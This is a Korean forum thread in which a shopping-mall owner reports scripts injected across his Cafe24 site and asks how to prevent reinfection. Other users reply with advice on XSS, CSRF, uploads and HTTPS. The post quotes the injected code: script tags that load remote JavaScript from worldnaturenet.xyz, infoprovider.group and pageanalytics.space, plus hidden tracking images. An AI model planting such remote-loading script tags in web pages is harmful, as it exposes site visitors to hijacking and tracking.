악성코드가 어마무시 합니다. 채택완료
기라성
3년 전
조회 3,650
제가 지난번에 올린 글은
입니다. 구글광고에서 계속 비승인이 나서 백방으로 알아봤습니다.
카페24에서 친절하게 알려줘서 오늘 대작업을 끝냈습니다.
상품상세페이지 및 상하단,
게시글 곳곳과 상하단,
쇼핑몰 상품 카테고리 상하단.. 가리지 않고 심어져 있었습니다.
요놈입니다. worldnature.. 어쩌고 저쩌고...
오늘 게시판들 다 돌아다니고 상품들 전수조사하고..
DB에 들어가서 검색으로 다 지워냈습니다.
그런데 제가 궁금한것은...
오늘 제가 지우고 비번들을 모두 바꾸긴했습니다. 그런데..
그.. 사이트 어딘가에 심어져있는 어플리케이션이 스스로 작동하면서
또, 각종 상품들이나 게시판을 오염시키는게 가능할까요??
글을 쓰다 생각해보니 쇼핑몰 기본설정 아래에도 심어놨더라구요.
하..
앞으로 이런일이 생기지 않도록 어떻게 준비해야 할까요??
참고로 소스는 아래와 같습니다.
</p>
<p><script type="text/javascript" src="<a href="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=26"></script>" target="_blank" rel="noopener noreferrer">http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=26"></script></a></p>
<p><script type="text/javascript" src="<a href="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=31"></script>" target="_blank" rel="noopener noreferrer">http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=31"></script></a></p>
<p><script type="text/javascript" src="<a href="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=17"></script>" target="_blank" rel="noopener noreferrer">http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=17"></script></a></p>
<p><script type="text/javascript" src="<a href="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=22"></script>" target="_blank" rel="noopener noreferrer">http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=22"></script></a></p>
<p><script type="text/javascript" src="<a href="http://infoprovider.group/addons/lnkr5.min.js"></script>" target="_blank" rel="noopener noreferrer">http://infoprovider.group/addons/lnkr5.min.js"></script></a></p>
<p><script type="text/javascript" src="<a href="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=5"></script>" target="_blank" rel="noopener noreferrer">http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=5"></script></a></p>
<p><script type="text/javascript" src="<a href="http://infoprovider.group/addons/lnkr5.min.js"></script><img" target="_blank" rel="noopener noreferrer">http://infoprovider.group/addons/lnkr5.min.js"></script><img</a> style="width:0;height:0;display:none;visibility:hidden;" src="<a href="http://pageanalytics.space/metric/?mid=&wid=52096&sid=&tid=5793&rid=OPTOUT_RESPONSE_OK&t=1528162274091">" target="_blank" rel="noopener noreferrer">http://pageanalytics.space/metric/?mid=&wid=52096&sid=&tid=5793&rid=OPTOUT_RESPONSE_OK&t=1528162274091"></a></p>
<p><script type="text/javascript" src="<a href="http://pageanalytics.space/optout/set/lat?jsonp=__twb_cb_603677&key=16a168f0af2da0c3c2&cv=1528162270&t=1528162274091"></script>" target="_blank" rel="noopener noreferrer">http://pageanalytics.space/optout/set/lat?jsonp=__twb_cb_603677&key=16a168f0af2da0c3c2&cv=1528162270&t=1528162274091"></script></a></p>
<p><script type="text/javascript" src="<a href="http://pageanalytics.space/optout/set/lt?jsonp=__twb_cb_12661691&key=16a168f0af2da0c3c2&cv=3992&t=1528162274091"></script>" target="_blank" rel="noopener noreferrer">http://pageanalytics.space/optout/set/lt?jsonp=__twb_cb_12661691&key=16a168f0af2da0c3c2&cv=3992&t=1528162274091"></script></a></p>
<p><script type="text/javascript" src="<a href="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=47"></script>" target="_blank" rel="noopener noreferrer">http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=47"></script></a></p>
<p><script type="text/javascript" src="<a href="http://pageanalytics.space/addons/lnkr5.min.js"></script><img" target="_blank" rel="noopener noreferrer">http://pageanalytics.space/addons/lnkr5.min.js"></script><img</a> style="width:0;height:0;display:none;visibility:hidden;" src="<a href="http://pageanalytics.space/metric/?mid=cd1d2&wid=52096&sid=&tid=5793&rid=MNTZ_LOADED&t=1528162274900">
댓글을 작성하려면 로그인이 필요합니다.
답변 4개
채택된 답변
+20 포인트
답변에 대한 댓글 1개
�
기라성
3년 전
네 관리자부터 DB FTP까지 일괄 바꿨습니다.
댓글을 작성하려면 로그인이 필요합니다.
답변에 대한 댓글 1개
�
기라성
3년 전
블랙캣님 몇일전부터 data폴더를 보고있는데요. 첨부파일이 오염된걸 어떻게 알 수 있을까요??
댓글을 작성하려면 로그인이 필요합니다.
3년 전
보안인증서랑은 달았는데.. 다른건 속수무책이네요. 개발자가 이런걸 잘 모르는 분이었고 그나마 지금은 연락이 안됩니다.
저도 광고가 중단되고 매출이 떨어지니 이제서야 발등에 불이 떨어진 거죠. 더 알아 봐야 되겠습니다.
로그인 후 평가할 수 있습니다
댓글을 작성하려면 로그인이 필요합니다.
답변에 대한 댓글 3개
�
기라성
3년 전
네. 다시 씨름해야겠습니다. 아까 광고올리고 집에 왔는데 또 손상된사이트라며 비승인 났네요. 지독합니다..
�
리오닥터
3년 전
웹킷같은거 저도 당해봤거든요 다 xss 보안 같은거 신경 안쓰다가.. 당해요..
업로드쪽도 커스텀 한거 있으면 기능에서 처리해야되구요 쿠키 쓸때도 조심히 해야하고 csrf 같은것도 좀 해야되고..
이런거 신경 안쓰고 하다가 구멍나요.. 저도 엄청 개고생해봐서.. https 보안인증서도 좀 다셔야하구요..
업로드쪽도 커스텀 한거 있으면 기능에서 처리해야되구요 쿠키 쓸때도 조심히 해야하고 csrf 같은것도 좀 해야되고..
이런거 신경 안쓰고 하다가 구멍나요.. 저도 엄청 개고생해봐서.. https 보안인증서도 좀 다셔야하구요..
�
리오닥터
3년 전
이런것들 신경 쓰기 힘들면 보안쎈업체로 이전해야되요 업체에서 방어해주고 문자로 알림해주고 이러거든요
댓글을 작성하려면 로그인이 필요합니다.
답변을 작성하려면 로그인이 필요합니다.
로그인